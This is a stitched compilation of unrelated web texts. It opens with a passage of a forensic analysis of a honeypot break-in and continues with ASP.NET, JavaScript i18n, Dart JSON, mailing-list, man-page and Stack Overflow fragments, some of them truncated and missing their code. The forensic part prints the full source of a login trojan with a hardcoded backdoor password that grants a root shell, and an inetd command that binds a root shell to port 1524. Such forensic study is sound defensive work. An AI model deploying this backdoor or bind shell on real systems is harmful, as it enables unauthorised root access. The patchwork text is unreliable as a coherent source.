So what did we learn about the binary file? Apparently, the sun1 file is some sort of backdoored login program. When the intruder gained access to the system, he renamed the original /bin/login to /usr/lib/libfl.k and replaced it with the sun1 binary. It is hypothesized that the sun1 trojan/wrapper of /bin/login will not log connections that use the backdoor password. On checking the recovered file with strings, we can see that the file is somehow linked to a "/usr/lib/libfl.k" file, the original login program. To me, it seems that the file checks for a specific setting of the DISPLAY variable (in this case, I believe the key to be "pirc") which activates the backdoor and drops the user into a root shell. Otherwise, the program dumps the user at the original login program.

I decided to have a quick search for the source code to this binary file, in hopes of retrieving additional information. I went to Packet Storm and conducted a search for "rootkit trojan DISPLAY pirc". It seems obvious from the description of the first result that turned up that this ulogin.c program is indeed the sun1 binary that was recovered from the Snort logs. The following is the source code from ulogin.c found on Packet Storm.

/*
 * PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!
 * Universal login trojan by Tragedy/Dor
 * IRC: [Dor]@ircnet
 *
 * Login trojan for pretty much any O/S...
 * Tested on: Linux, BSDI 2.0, FreeBSD, IRIX 6.x, 5.x, Sunos 5.5,5.6,5.7
 * OSF1/DGUX4.0,
 * Known not to work on:
 * SunOS 4.x and 5.4... Seems the only variable passwd to login
 * on these versions of SunOS is the $TERM... and its passed via
 * commandline option... should be easy to work round in time
 *
 * #define PASSWORD - Set your password here
 * #define _PATH_LOGIN - This is where you moved the original login to
 * login to hacked host with...
 * from bourne shell (sh, bash)
 * sh
 * DISPLAY="your pass";export DISPLAY;telnet host
 *
 */

#include <stdio.h>

#if !defined(PASSWORD)
#define PASSWORD "j4l0n3n"
#endif

#if !defined(_PATH_LOGIN)
# define _PATH_LOGIN "/bin/login"
#endif

main (argc, argv, envp)
int argc;
char **argv, **envp;
{
    char *display = getenv("DISPLAY");

    if ( display == NULL ) {
        execve(_PATH_LOGIN, argv, envp);
        perror(_PATH_LOGIN);
        exit(1);
    }
    if (!strcmp(display,PASSWORD)) {
        system("/bin/sh");
        exit(1);
    }
    execve(_PATH_LOGIN, argv, envp);
    exit(1);
}

Final Binary Analysis

As we can see in the source code, the attacker is to issue the following commands in order for this backdoor to work correctly:

from bourne shell (sh, bash)
sh
DISPLAY="your pass";export DISPLAY;telnet host

Using this information, we can begin to see how this backdoor dumps the user at a root shell. Since the backdoor calls on the original "login" program, it is safe to say that if the DISPLAY variable isn't set to the correct value, the user is passed back to the original login program specified in the source code of the exploit by the following line:

# define _PATH_LOGIN "/bin/login"

By looking at the payload of the exploit once the buffer overflow was successful, we can see the command(s) executed by the intruder.

Reference: FTP SESSION ANALYSIS

./bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/x;/usr/sbin/inetd -s /tmp/x;sleep 10;/bin/rm -f /tmp/x

The above command(s) were issued, and we saw how the intruder created a root shell running on port 1524 (the ingreslock port) using inetd. We can see four (4) different commands being executed within the above command string. If we break them up, we can then decipher what each command did.

./bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/x;

This command uses the Korn shell to create a file called /tmp/x containing a one-line entry of an inetd configuration file.
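That one-line entry follows inetd's fixed field order: service name, socket type, protocol, wait/nowait flag, user, server program, and the program's arguments. A short Python helper (my own, for illustration) splits the planted entry into those fields:

```python
INETD_FIELDS = [
    "service", "socket_type", "protocol",
    "wait", "user", "server", "args",
]

def parse_inetd_entry(line):
    """Split one inetd.conf entry into named fields; everything after
    the server program is kept together as the argument string."""
    parts = line.split(None, 6)  # at most 7 fields; args may contain spaces
    return dict(zip(INETD_FIELDS, parts))

entry = parse_inetd_entry("ingreslock stream tcp nowait root /bin/sh sh -i")
print(entry["service"], entry["user"], entry["server"])  # ingreslock root /bin/sh
```

Read this way, the entry tells inetd to listen on the ingreslock service (port 1524/tcp) and hand every connection an interactive /bin/sh running as root.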
The file /tmp/x contained the inetd configuration entry "ingreslock stream tcp nowait root /bin/sh sh -i".

/usr/sbin/inetd -s /tmp/x;

This starts inetd using /tmp/x as its configuration file.

sleep 10;

This tells the system to stall for 10 seconds, giving the inetd process time to start with its new configuration file.

/bin/rm -f /tmp/x

This command simply removes the /tmp/x file, which was used as the inetd configuration file, from the /tmp directory once inetd has started.

Conclusion

The need for increased vigilance in learning forensic analysis, with and without IDS logs, continues to grow. The reality of this industry remains the same despite the continued changes and advancements in the tools hackers use. The fact remains that Snort and other IDS solutions are currently limited to signature-based detection. If an unknown exploit is used against a monitored network, the only evidence made available from the crime scene is the system and application log files. As a result, it is critical to ensure that logs remain unaltered by storing them remotely for follow-up investigations. By monitoring system logfiles and utilizing intrusion detection systems such as Snort on both large and small production networks, systems administrators gain additional coverage and a record of events to go back and look at when something occurs.

Tools Used Within This Analysis

tcpdump - Tcpdump prints out the headers of packets on a network interface that match a boolean expression.

Ethereal - Ethereal is a GUI network protocol analyzer. It lets you interactively browse packet data from a live network or from a previously saved capture file.

File - The file utility conducts three sets of tests (filesystem tests, magic number tests, and language tests) and prints out the file type.
Strings - For each file given, GNU strings prints the printable character sequences that are at least 4 characters long and are followed by an unprintable character.

Truss - The truss utility traces the system calls made by the specified process or program.

Alan Neville has been involved in information security for the past three years. He is Director of the Ireland Security Information Centre (ISIC), a Fate Research Labs funded centre based in Europe. Alan heads all European operations as well as managing the Ireland honeynet, a project to identify ongoing attacks that threaten the network infrastructure and security posture of Irish-based networks nation-wide.

Copyright 2007, SecurityFocus
http://www.securityfocus.com/infocus/1676
ASP.NET web applications (including web services) use threads in a thread pool to process client requests. These threads are created by the .NET framework and are reused to process multiple requests. The number of threads in the pool increases only when the number of simultaneous client requests increases. Typically, you have no control over which thread is used to process a particular incoming request: your application could have processed thousands of requests from users with only one thread doing all the work. The other extreme is that many requests come in at exactly the same moment, so multiple threads have to be used to do the work.

Suppose a method in one of your classes is to be executed by threads in the thread pool; a good example is the Page_Load method of your aspx page class. How do you declare and use an object that is only visible to the current thread? For example, you may want to use an old COM object in this method. This COM object requires some heavy processing at the time of creation and initialization. For performance reasons, you probably don't want to create and initialize this COM object each time your method is called. If you declared the object as a global (static or shared) variable, then all concurrently running threads would be able to access it. Declaring the object as a non-static class variable may not help either because, for example, each time a new request reaches your web application, a new instance of your aspx page class is used to process the request (even if the same thread in the thread pool is doing the work); therefore you would have to create and initialize your COM object for each user request.

There is nothing wrong with sharing an object between different threads if the object is thread-safe or you have added synchronization code so that only one thread can access it at a time (all the other threads will block until the owner thread releases the object).
However, if your object is working on a lengthy database transaction, it may not be the best approach to require all the other threads to wait until the operation is completed. In my recent article, Using COM objects in multithreaded .NET applications, I presented a solution for this problem. Basically, I provide a utility class that helps you to create (and store) a COM object in the current thread and retrieve it at a later time. This is ideal for .NET applications that use a thread pool, like ASP.NET. What I want to do in this article is generalize the idea to any object (it is not restricted to COM objects any more).

My ObjMan class is contained in ThreadObjectManager.dll. It is modified from the code in my other article mentioned above. This class has three static (shared) methods: GetObject, SaveObject, and RemoveObject. Here is a description of these methods.

GetObject: It takes three parameters, and the return type is Object. The first parameter is the name string of the object to be returned. This name string is supplied by the user to differentiate between different objects created within the same thread. The second and third parameters are optional; they are the class name string and the assembly name string. When this method is called, it retrieves the object with the given name if it was already created (or saved) within the same thread by a previous call to GetObject (or a call to SaveObject). If no such object can be found and no other parameters are specified, the method returns null (Nothing). If the class name and assembly name parameters are specified, the method uses them to load the corresponding assembly and to create an instance of the corresponding class; the newly created object is saved under the given name string. The object with the given name, if found or created, is returned.

SaveObject: This method has two parameters, and the return type is bool (Boolean).
The first parameter is the name string of the object to be saved. The second parameter is the object itself. If you create an object and call the SaveObject method, passing a name string you choose and the object value, it saves your object for the current thread so that you can retrieve it later by calling the GetObject method from the same thread using the name string. Unlike GetObject, the SaveObject method does not create the object for you; you have to create the object yourself before calling SaveObject.

RemoveObject: This method simply removes the object with the given name from the current thread. It is not possible to remove an object created (or saved) from a different thread.

Please note that a method call such as GetObject("MyObjName") returns different objects if executed from different threads; the object name string only differentiates objects created (or saved) within the same thread.

Here is sample C# code using the GetObject method to create the COM object described in my other article. You need to register DummyCom.dll and add it to your .NET project so that the .NET wrapper DLL will be generated.

using DUMMYCOMLib;
using ThreadObjectManager;
...
Object obj = ObjMan.GetObject("MyDummyObj",
    "DUMMYCOMLib.DummyObjClass", "Interop.DUMMYCOMLib");
String sOutput = ((DummyObjClass)obj).Test("This is a test");
// ObjMan.RemoveObject("MyDummyObj");
...

When the above code is executed, the COM object is created only once in each thread, unless you uncomment the line that calls RemoveObject. For .NET internal objects, it is easier to combine the SaveObject and GetObject methods as follows, since there is no need to load any assembly.

using ThreadObjectManager;
...
Object obj = ObjMan.GetObject("MyHashtable");
if (obj == null)
{
    obj = new Hashtable();
    ObjMan.SaveObject("MyHashtable", obj);
    ((Hashtable)obj).Add("MyString",
        "This string is added at most once for each thread");
}
String sObjName = Guid.NewGuid().ToString();
Hashtable myHashtable = (Hashtable)obj;
myHashtable.Add(sObjName, "This string is added every time");
...

Again, the myHashtable object is created and saved only once for each thread that executes the above code.

The implementation of the ObjMan class is simple and straightforward. Internally, the ObjMan class uses a global (static) Hashtable to store data. Data items in this hashtable are hashtables themselves. Each of these child hashtables corresponds to a thread; the key for the parent hashtable is the thread name. Each thread accesses its own hashtable using the thread name. If a thread has no name, a dynamically generated GUID string is assigned as its name. When an object is created and saved, it is actually stored in the child hashtable of the current thread, with the object name string as the key. When an object is retrieved, the code first finds the child hashtable for the current thread, then uses the given object name string to find the item stored in that child hashtable.

Thank you for reading my article. Please visit my home page for my other articles and tools.
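As an aside, the hashtable-of-hashtables design described above maps naturally onto other runtimes. Here is a rough Python analogue (my own illustration, not a port of ObjMan): a module-level dictionary keyed by thread name, with child dictionaries keyed by object name, and a lock guarding the shared parent just as the static Hashtable must be guarded.

```python
import threading

_lock = threading.Lock()
_registry = {}  # thread name -> {object name -> object}

def _bucket():
    """Return (creating it if needed) the calling thread's own dictionary.

    Like the article's design, the parent table is keyed by the thread
    name; Python assigns every thread a unique name automatically."""
    key = threading.current_thread().name
    with _lock:
        return _registry.setdefault(key, {})

def save_object(name, obj):
    _bucket()[name] = obj

def get_object(name, factory=None):
    """Return the named per-thread object, building it with factory
    on first use (the GetObject create-if-missing behavior)."""
    bucket = _bucket()  # only its own thread ever touches this dict
    if name not in bucket and factory is not None:
        bucket[name] = factory()
    return bucket.get(name)

def remove_object(name):
    _bucket().pop(name, None)
```

Each thread that calls get_object("cache", dict) gets its own dictionary, created at most once per thread. In practice, Python code would reach for threading.local(), which packages exactly this pattern; the sketch only mirrors the design described in the article.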
http://www.codeproject.com/KB/threads/threadobjectmanager.aspx
Internationalization (also referred to as i18n) is the process of creating or reworking products and services so that they can easily be adapted to specific local languages and cultures. Localization (also referred to as L10n) is the process of adapting internationalized software for a specific region or language. In other words, internationalization is the process of adapting your software to support multiple cultures (currency format, date format, and so on), whereas localization is the process of implementing one or more cultures. These two processes are usually adopted by companies that have interests in different countries, but they can also come in handy for a single developer working on their own web site. For example, as you may know, I'm Italian and I own a web site. My web site is presented in English, but I could decide to internationalize it and then localize it into Italian. This would be useful for people who are native Italian speakers and are not comfortable with the English language.

Developers often think i18n is about translations to non-English languages, and that i18n is only needed when expanding an existing application to multiple countries or markets. I always try to explain that i18n is about "talking" in general. Every application, at some point, needs to "talk" to its users. To communicate with the users, the application might need pluralization support, gender inflection, date formatting, number formatting, and currency formatting. Even in English, it can be difficult to get this right.

Globalize and the JavaScript Internationalization API

To some of you, this may come as a surprise, but JavaScript has native support for internationalization in the form of the Internationalization API (also referred to as ECMA-402). The Intl object is available on the window object and acts as a namespace for the Internationalization API.
This API currently provides methods to format numbers and dates and to compare strings in a specific language. Now that you know of the existence of the Internationalization API, you could be led into thinking that Globalize uses it behind the scenes. That approach would surely yield better date and number formatting performance. However, because support for the API is low and really inconsistent among browsers, the library doesn't use it.

Now I want to give you a taste of the Internationalization API.

Formatting a Date

Output:
22/3/2019
3/22/2019
22/03/2019

In this example, I use the DateTimeFormat constructor to create a new date formatter using the specified locales ("it-IT", "en-US", and "en-GB"). Then, I invoke the format method to format the date object.

Formatting a Number

Output:
2.153,93
2,153.93
2,153.93

Conclusion

In this article, I discussed what internationalization and localization are and why they are important for expanding a product's market. I briefly introduced you to the Internationalization API by mentioning some supported features, and then I showed some examples of their use.
https://www.geeksforgeeks.org/how-does-internationalization-work-in-javascript/?ref=rp
Hello Audi,

I tried to compile using MSVC and I got the following error:

"fatal error C1070: mismatched #if/#endif pair in file 'c:\temp\temporary workspaces\oxe\dicomtopgm.cpp'"

So, there is an "#ifdef" statement at line number 1083 without its "#endif" counterpart.

Best regards,
Elizeu Neto
Universidade Federal de Alagoas
Laboratório de Óptica Quântica e Não Linear

----- Original Message -----
From: Audi
To: vtkusers at public.kitware.com
Sent: Saturday, February 17, 2001 1:05 PM
Subject: [vtkusers] dicom to pgm prog

Hi,

I found dicomtopgm.cpp in  But when I tried to compile it, it gave me a weird error: the error said there is a mismatched #endif, but when I check the line pointed to by the error, it is an empty line. I tried to check the program, but nothing seems wrong; maybe I am missing the mistake. So can anybody help me to compile and run the program that I attach here, and let me know whether you can compile it successfully? I already tried to email the person who put the source code on that website, but no reply so far.

Thanks in advance,
Audi
https://public.kitware.com/pipermail/vtkusers/2001-March/005837.html
ACL_DELETE_ENTRY(3)      BSD Library Functions Manual      ACL_DELETE_ENTRY(3)

NAME
     acl_delete_entry — delete an ACL entry

LIBRARY
     Linux Access Control Lists library (libacl, -lacl).

SYNOPSIS
     #include <sys/types.h>
     #include <sys/acl.h>

     int acl_delete_entry(acl_t acl, acl_entry_t entry_d);

RETURN VALUE
     The acl_delete_entry() function returns the value 0 if successful;
     otherwise the value -1 is returned and the global variable errno is set
     to indicate the error.

ERRORS
     If any of the following conditions occur, the acl_delete_entry()
     function returns -1 and sets errno to the corresponding value:

     [EINVAL]  The argument acl_p is not a valid pointer to an ACL.
               The argument entry_d is not a valid pointer to an ACL entry.

STANDARDS
     IEEE Std 1003.1e draft 17 (“POSIX.1e”, abandoned)

SEE ALSO
     acl_copy_entry(3), acl_create_entry(3)
http://man7.org/linux/man-pages/man3/acl_delete_entry.3.html
Fetch Data Dynamically

Get data from a file or server.

What's the point?
- Data on the web is often formatted in JSON.
- JSON is text based and human readable.
- The dart:convert library provides support for JSON.
- Use HttpRequest to dynamically load data.

Web applications often use JSON (JavaScript Object Notation) to pass data between clients and servers. Data can be serialized into a JSON string, which is then passed between a client and server, and revived as an object at its destination. This tutorial shows you how to use functions in the dart:convert library to produce and consume JSON data. Because JSON data is typically loaded dynamically, this tutorial also shows how a web app can use an HTTP request to get data from an HTTP server. For web apps, HTTP requests are served by the browser in which the app is running, and thus are subject to the browser's security restrictions.

About JSON

The JSON data format is easy for humans to write and read because it is lightweight and text based. With JSON, various data types and simple data structures such as lists and maps can be serialized and represented by strings.

Try it! The following app, its_all_about_you, displays the JSON string for data of various types. Click run to start the app. Then change the values of the input elements, and check out the JSON format for each data type. You might prefer to open the app in DartPad to have more space for the app's code and UI.

The dart:convert library contains two convenient functions, JSON.encode() and JSON.decode(), for working with JSON strings. To use these functions, you need to import dart:convert into your Dart code:

import 'dart:convert';

The JSON.encode() and JSON.decode() functions can handle these Dart types automatically:
- num
- String
- bool
- null
- List
- Map

Serializing data into JSON

Use the JSON.encode() function to serialize an object that supports JSON.
The showJson function, from the its_all_about_you example, converts all of the data to JSON strings.

import 'dart:convert';
...
// Display all values as JSON.
void showJson(Event e) {
  // Grab the data that will be converted to JSON.
  num favNum = int.parse(favoriteNumber.value);
  num pi = double.parse(valueOfPi.value);
  bool chocolate = loveChocolate.checked;
  String sign = horoscope.value;
  List<String> favoriteThings = [
    favOne.value,
    favTwo.value,
    favThree.value
  ];

  Map formData = {
    'favoriteNumber': favNum,
    'valueOfPi': pi,
    'chocolate': chocolate,
    'horoscope': sign,
    'favoriteThings': favoriteThings
  };

  // Convert everything to JSON and display the results.
  intAsJson.text = JSON.encode(favNum);
  doubleAsJson.text = JSON.encode(pi);
  boolAsJson.text = JSON.encode(chocolate);
  stringAsJson.text = JSON.encode(sign);
  listAsJson.text = JSON.encode(favoriteThings);
  mapAsJson.text = JSON.encode(formData);
}

Below is the JSON string that results from the code using the original values from the its_all_about_you app. Boolean and numeric values appear as they would if they were literal values in code, without quotes or other delineating marks. A boolean value is either true or false. A null object is represented with null. Strings are contained within double quotes. A list is delineated with square brackets; its items are comma-separated. The list in this example contains strings. A map is delineated with curly brackets; it contains comma-separated key/value pairs, where the key appears first, followed by a colon, followed by the value. In this example, the keys in the map are strings.

Parsing JSON data

Use the JSON.decode() function from the dart:convert library to create Dart objects from a JSON string.
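Both halves of this round trip look much the same in other standard libraries. As a side-by-side illustration (my own aside, not part of the tutorial's sample app), here is the equivalent encode/decode pair using Python's json module on the same data:

```python
import json

form_data = {
    "favoriteNumber": 73,
    "valueOfPi": 3.141592,
    "chocolate": True,
    "horoscope": "Cancer",
    "favoriteThings": ["monkeys", "parrots", "lattes"],
}

encoded = json.dumps(form_data)   # plays the role of JSON.encode()
decoded = json.loads(encoded)     # plays the role of JSON.decode()

assert decoded == form_data       # the round trip preserves the structure
print(encoded)
```

Note how the boolean comes out as an unquoted true and the strings keep their double quotes, exactly as described above.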
The its_all_about_you example initially populates the values in the form from this JSON string:

String jsonDataAsString = '''
{
  "favoriteNumber": 73,
  "valueOfPi": 3.141592,
  "chocolate": true,
  "horoscope": "Cancer",
  "favoriteThings": ["monkeys", "parrots", "lattes"]
}
''';

Map jsonData = JSON.decode(jsonDataAsString);

This code calls the JSON.decode() function with a properly formatted JSON string. Note that Dart strings can use either single or double quotes to denote strings. JSON requires double quotes. In this example, the full JSON string is hard coded into the Dart code, but it could be created by the form itself or read from a static file or received from a server. An example later on this page shows how to dynamically fetch JSON data from a file that is co-located with the code for the app.

The JSON.decode() function reads the string and builds Dart objects from it. In this example, the JSON.decode() function creates a Map object based on the information in the JSON string. The Map contains objects of various types including an integer, a double, a boolean value, a regular string, and a list. All of the keys in the map are strings.

About URIs and HTTP requests

To make an HTTP GET request from within a web app, you need to provide a URI (Uniform Resource Identifier) for the resource. A URI (Uniform Resource Identifier) is a character string that uniquely names a resource. A URL (Uniform Resource Locator) is a specific kind of URI that also provides the location of a resource. URLs for resources on the World Wide Web contain three pieces of information:
- The protocol used for communication
- The hostname of the server
- The path to the resource

For example, the URL for this page breaks down as follows: This URL specifies the HTTP protocol.
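The same three-part breakdown can be reproduced programmatically. As an illustration (mine, not part of the tutorial), Python's urllib.parse splits this page's own address into exactly those pieces:

```python
from urllib.parse import urlsplit

parts = urlsplit("http://webdev.dartlang.org/tutorials/get-data/fetch-data")

print(parts.scheme)  # the protocol used for communication: http
print(parts.netloc)  # the hostname of the server: webdev.dartlang.org
print(parts.path)    # the path to the resource: /tutorials/get-data/fetch-data
```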
At its most basic, when you enter an HTTP address into a web browser, the browser sends an HTTP GET request to a web server, and the web server sends an HTTP response that contains the contents of the page (or an error message).

Most HTTP requests in a web browser are simple GET requests asking for the contents of a page. However, the HTTP protocol allows for other types of requests, such as POST for sending data from the client.

A Dart web app running inside of a browser can make HTTP requests. These HTTP requests are handled by the browser in which the app is running. Even though the browser itself can make HTTP requests anywhere on the web, a Dart web app running inside the browser can make only limited HTTP requests because of security restrictions. Practically speaking, because of these limitations, HTTP requests from web apps are primarily useful for retrieving information in files specific to and co-located with the app.

The SDK provides useful classes, such as Uri and HttpRequest, for formulating URIs and making HTTP requests.

Using the getString() function to load a file

One useful HTTP request your web app can make is a GET request for a data file served from the same origin as the app. The example below reads a data file called portmanteaux.json that contains a JSON-formatted list of words. When you click the button, the app makes a GET request of the server and loads the file.

Try it! Click run and then click the Get portmanteaux button.

This program uses a convenience method, getString(), provided by the HttpRequest class to request the file from the server. The getString() method uses a Future object to handle the request. A Future is a way to perform potentially time-consuming operations, such as HTTP requests, asynchronously. If you haven't encountered Futures yet, you can learn more about them in Asynchronous Programming: Futures.
Until then, you can use the code above as an idiom and provide your own code for the body of the processString() function and your own code to handle the error.

Using an HttpRequest object to load a file

The getString() method is good for an HTTP GET request that returns a string loaded from the resource. For different cases, you need to create an HttpRequest object, configure its header and other information, and use the send() method to make the request. This section rewrites the portmanteaux code to explicitly construct an HttpRequest object.

Setting up the HttpRequest object

The mouse-click handler for the button creates an HttpRequest object, configures it with a URI and callback function, and then sends the request. Let's take a look at the Dart code:

void makeRequest(Event e) {
  var path = '';
  var httpRequest = new HttpRequest();
  httpRequest
    ..open('GET', path)
    ..onLoadEnd.listen((e) => requestComplete(httpRequest))
    ..send('');
}

Sending the request

The send() method sends the request to the server.

httpRequest.send('');

Because the request in this example is a simple GET request, the code can send an empty string. For other types of requests, such as POST requests, this string can contain further details or relevant data. You can also configure the HttpRequest object by setting various header parameters using the setRequestHeader() method.

Handling the response

To handle the response from the request, you need to set up a callback function before calling send(). Our example sets up a one-line callback function for onLoadEnd events that in turn calls requestComplete(). This callback function is called when the request completes, either successfully or unsuccessfully. The callback function for our example, requestComplete(), checks the status code for the request.
If the status code is 200, the file was found and loaded successfully. The contents of the requested file, portmanteaux.json, are returned in the responseText property of the HttpRequest object. Using the JSON.decode() function from the dart:convert library, the code easily converts the JSON-formatted list of words to a Dart list of strings, creates a new LIElement for each one, and adds it to the <ul> element on the page.

Populating the UI from JSON

The data file in the portmanteaux example, portmanteaux.json, contains a JSON-formatted list of strings.

[
  "portmanteau", "fantabulous", "spork", "smog",
  "spanglish", "gerrymander", "turducken", "stagflation",
  "bromance", "freeware", "oxbridge", "palimony",
  "netiquette", "brunch", "blog", "chortle",
  "Hassenpfeffer", "Schnitzelbank"
]

Upon request, the server reads this data from the file and sends it as a single string to the client program. The client program receives the JSON string and uses JSON.decode() to create the String objects specified by the JSON string.

Other resources

Check out Chris Buckett's article, Using Dart with JSON Web Services, for more information and an example with source code for both client and server programs.

What next?

- If you haven't yet read Asynchronous Programming: Futures
https://webdev.dartlang.org/tutorials/get-data/fetch-data
Configuration transformation is only done when publishing. Your base configuration file should have your development settings. If you choose to use the default build configurations, normally the release transform file should contain your production environment settings and the debug transform file will contain your test environment settings. Personally, I usually create a new build configuration for testing and for production and leave the debug and release transforms empty.

I am testing your code now. It all seems to be working well. But I would definitely call this first:

self.navigationItem.hidesBackButton = YES;

After you call this, then create your new leftBarButtonItem. The full code that I used is below:

self.navigationItem.hidesBackButton = YES;
self.navigationItem.leftBarButtonItem = [[UIBarButtonItem alloc]
    initWithTitle:@"Hi"
    style:UIBarButtonItemStylePlain
    target:self
    action:@selector(triggerBackNavigation:)];

I know you're using an image, but I just used a button with text to see if it works properly.

Probably your custom binding is configured in a way that matches the WSHttpBinding capabilities. According to the WCF Binding converter, this is the custom binding that matches the WS HTTP default settings:

<customBinding>
  <binding name="NewBinding0">
    <transactionFlow />
    <security authenticationMode="SecureConversation" messageSecurityVersion="WSSecurity11WSTrustFebruary2005WSSecureConversationFebruary2005WSSecurityPolicy11BasicSecurityProfile10">
      <secureConversationBootstrap authenticationMode="UserNameForSslNegotiated" messageSecurityVersion="WSSecurity11WSTrustFebruary2005WSSecureConversationFebruary2005WSSecurityPolicy11BasicSecurityProfile10" />
    </security>
    <textMessageEncoding />
    <httpTransport />
  </binding>
</customBinding>

You have an error in the onclick part of the a tag; see, the url begins with:: If you are clicking the link on the page, onclick() is executed. If you are clicking the link in the page source, href is used and the link there is valid.
I think it is a NullPointer: protected static Properties props; // << NULL public void onModuleLoad() { loadProps(); // props is still NULL buildUI(); } void loadProps() { // props is still NULL props.set("scarsa manutenzione manto stradale", "images/red.png"); // BANG! [...] By the way: Why did you make props static? There is only one instance of you EntryPoint. So no state can be shared. Make sure you specified App Domain and Site URL. Those have to point to the server where your Share Feed Dialog will be triggered from. As for testing it can point to local host. Example: App Domain: localhost Site URL: Good luck! Marta Try using a media query, selecting only webkit specific stuff such as: @media screen and (-webkit-min-device-pixel-ratio:0) { /* Your CSS */ } This query checks the device pixel ratio in webkit. Safari & Chrome are the only big browsers using webkit, so this will not affect FireFox or IE. Kernel versions are different.. arm926 built for kernel version 2.6.32 Ezsdk 6.0 for beagleboard XM uses kernel version 3.3.7 I think, need to use open source library () Applets are not allowed to do a number of things, including file I/O and various networking tasks; as your applet is trying to do one. You may need to sign you applet. Check this reference I found the answer in a post here: how to add files in web.config transformation process? In your "App Data" folder you'll find your publish profiles you created and can right click on them to add a config transform file. Your function only accepts one argument (numArray), not three—this is why your call to getMaxOfArray is failing. If you are writing a one-liner, you should use call instead of apply for a series of parameters rather than an array, as so: Math.max.apply(null, [1, 3, 9]); Math.max.call(null, 1, 3, 9); For a function, you can use the arguments object for a variable number of parameters, if you do not want the user to pass an array. Here's how you would go about doing it this way. 
(Note that I still call apply here, because I store all of the arguments called by the user into an array.) function getMaxOfArguments() { var parameters = 1 <= arguments.length ? [].slice.call(arguments, 0) : []; return Math.max.apply(null, parameters); } Now, your second function call should wo The behavior you describe sounds like you are calling .ToString() on an Image object. Images are not strings, so the .ToString() method will perform the default behavior of writing the class name and a property like System.Byte[] to the label. Darren's link in the comments shows how to write an array of bytes to the response stream, though if you really really want to keep it a string and the image size is small you can also try using the data:uri format for image tags: stackoverflow.com/questions/6826390/... I'd go with the custom httphandler to write to stream, since the data uri format might not be supported with all browsers and has a size limit. But, if you're just serving small images to modern browsers, it may be for you. I remember having the same issue when using transaction.add. From then on one of my base rules was to never user transaction.add again and use transaction.replace instead. Try it, it should work. I guess you should think fo a better approach than iterating over the EditTexts with getChildAt() to collect all the value. I take it that the user can change the values in the EditTexts, you can have an Array of size 30 of Values and everytime the user enters / changes a value you change the according value in the Array. Use a listener that changes the values in your Array like this. you are aware that in: .mainnav ul li a:link,.mainnav ul li a:visited there are double padding decalarations? padding:4px; padding: 0 0.73em; You can combine those: padding: 4px 0.73em; Seems that the issue with the navigation list is that there is too much spacing in between them in combination with the amount of items. 
I there are too much items, the normal behavior is the wrapping, you could decrease spacing, font-size to fix this. At first look it seems like a possibility of 2 issues ContactManager object which you are trying to save is null Your variable name 'Contact' is incorrect, it should be 'contact' (some hibernate thingy) Where is your hbm.xml file ? There may be a reference of 'Contact' the class in that file still around somewhere Edit Solutions Put a if (developer != null) before your 'save(developer)' Rename Contact to contact Put the hbm file contents on the question, without that cant review the mapping Hope it clear now. Edit 2 : Do a clean build. Its possible your build is not updated. .NET uses BStrings, which are length-prefixed and null-terminated. So if the first character in RecievedString is the null character (''), then it will not be printed, since strings end at their first null character. Homebrew mainly uses built-in tools, so formulae generally should be built against system Python anyway. You shouldn't have any problem with them unless you override system Python with Homebrew ones (which is generally not recommended unless you need to do something special). Without resorting to xml manipulation, the following answer may help you Add a 'clear' element to WebDAV authoringRules using powershell There are several ways and depending on what's your deployment structure it may make sense to pick one or another. META-INF/ejb-jar.xml - this is used when the EJBs are inside their own JAR which in turn is part of an EAR. WEB-INF/ejb-jar.xml - this is used when EJBs are part of a WAR. annotations - many configuration options can be specified through annotations on the bean class itself. The above are configurations specific to EJBs. However, some of the resources you mention may be specified in both ejb-jar.xml and web.xml. For reference, try reading the schema file - it's fairly well documented, or something like this. 
If it is a system wide config, each user can override a config value in his/her global and local settings. But there is no easy way to "deactivate" a setting in a lower config file. Even set it to "" generally has unintended consequences. That very topic was discussed in April 2010. For instance, deactivating the send-email option: True, after thinking a bit about this using no value to unset is a horrible, horrible hack. git-send-email should be corrected to not only check that there is value from config or command line option, but also that it is sane (i.e. non-empty, or simply true-ish if we say that smtpuser = "0" is not something we need to worry about supporting). That would be true for any setting: the diff.c#run_diff_cmd() function will attempt to run an external diff i Issue resolved with following steps (thanks to Karl Seguin's 'The Little MongoDB Book'). If you installed MongoDB via the download package from mongodb.org, you have to create create your own config file in /bin. Follow the instructions below (copied from Karl Seguin's book): download package unzip package Create a new text file in the bin subfolder named mongodb.config (if you have permission issues saving the file, save it first to your desktop then move file into folder). Add a single line to your mongodb.config: dbpath=PATH_TO_WHERE_YOU_WANT_TO_STORE_YOUR_DATABASE_FILES. For example, on Windows you might do dbpath=c:mongodbdata and on Linux you might do dbpath=/var/lib/ mongodb/data. Make sure the dbpath you specified exists Launch mongod with the --config /path/to/your/mongodb you can have either a web.config for a web project or an app.config for an application. as alternative you can load in custom configuration files see also No Git config includes operate: as if its contents had been found at the location of the include directive ref That means you can't override/remove the include itself, as as soon as it's found the contents of the included file are injected/loaded. 
You can of course override the settings it contains in a more specific config file: # ~/.git.config.team [user] name = name Locally, via git config user.name nic # /some/project/.git/config [user] name = alias Yielding: /some/project $ git config user.name alias /some/project $ it seems you create form at wrong place, try to get main controller first: $CI =$ get_instence(); 'rules'=>'required|min_length['.$CI->config->item('min_password_length', 'ion_auth').']' start.py ... options.ConfigFile = args.filename ... options.py from ConfigReader import getConfigValue as getVal, ConfigFile def getTest(): Test = getVal('main', 'test') return Test ConfigReader.py import os import ConfigParser ConfigFile='default.cfg' def config(): cfg = ConfigParser.ConfigParser() for f in set(['default.cfg',ConfigFile]): Try changing the ConfigurationSaveMode from ConfigurationSaveMode.Minimal to ConfigurationSaveMode.Modified Modified only saves the properties that you have changed. From MSDN:. Took me a while to find the problem. It seems the collections don't know which elementitems to look for in the config file. Therefore Adding an ItemName at the Collections ConfigurationCollection-Attribute will do the trick: ... [ConfigurationCollection(typeof(LoggerRegistration), AddItemName = "LoggerRegistration")] public class LoggerRegistrations : ConfigurationElementCollection { ... . ... [ConfigurationCollection(typeof(LogMapperElement), AddItemName = "LogMapper")] public class LogMappers : ConfigurationElementCollection ... The ItemName must be set to the tagname used in the config file for the collections elements, and be passed via 'AddItemName="..."' App.config that resides in a Class Library project would not be loaded (at least not without extra effort), the only configuration loaded by the framework is the Client configuration (i.e the Web.config of a project that references and uses your Class Library). See this answer for possible solutions. A web application will use web.config. 
